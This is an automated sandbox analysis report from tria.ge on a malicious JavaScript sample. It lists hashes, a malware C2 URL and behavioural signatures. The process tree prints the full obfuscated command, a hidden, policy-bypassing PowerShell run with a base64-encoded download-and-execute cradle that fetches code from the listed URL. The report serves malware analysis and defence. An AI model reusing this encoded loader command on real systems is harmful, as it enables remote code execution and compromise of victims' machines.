Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
122s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
25/12/2023, 14:59
Static task
static1
Behavioral task
behavioral1
Sample
278c4fd952f5da7ec81a7659a470ddab.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
278c4fd952f5da7ec81a7659a470ddab.js
Resource
win10v2004-20231215-en
General
-
Target
278c4fd952f5da7ec81a7659a470ddab.js
-
Size
89KB
-
MD5
278c4fd952f5da7ec81a7659a470ddab
-
SHA1
895414c71c6da889549e5ab031d734f5a8e16aa8
-
SHA256
3ac78ec7d0d61fe432200370c6c2ba9747ce918f14a8c983df27165dcd7c8517
-
SHA512
bec85649fec9e9dd87ac27d7d5aca66f8c060b167c91701777a7e142dafed9bba32d34f18af657c6d5c245eb9919bff365b5ac61659c98d7e91f3a08c0a43692
-
SSDEEP
1536:nlIqIb6B3tt5xLLfw9Ry98guHVBqqg2bcruayUHmLKeZaMU7GwbWBPwVGWl9SZ8V:nlIVw3ttnLLfw9Ry98guHVBqqg2bcruU
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2300 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2300 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2300 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2912 wrote to memory of 2040 2912 wscript.exe 28 PID 2912 wrote to memory of 2040 2912 wscript.exe 28 PID 2912 wrote to memory of 2040 2912 wscript.exe 28 PID 2040 wrote to memory of 2300 2040 cmd.exe 30 PID 2040 wrote to memory of 2300 2040 cmd.exe 30 PID 2040 wrote to memory of 2300 2040 cmd.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\278c4fd952f5da7ec81a7659a470ddab.js1⤵
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2300
-
-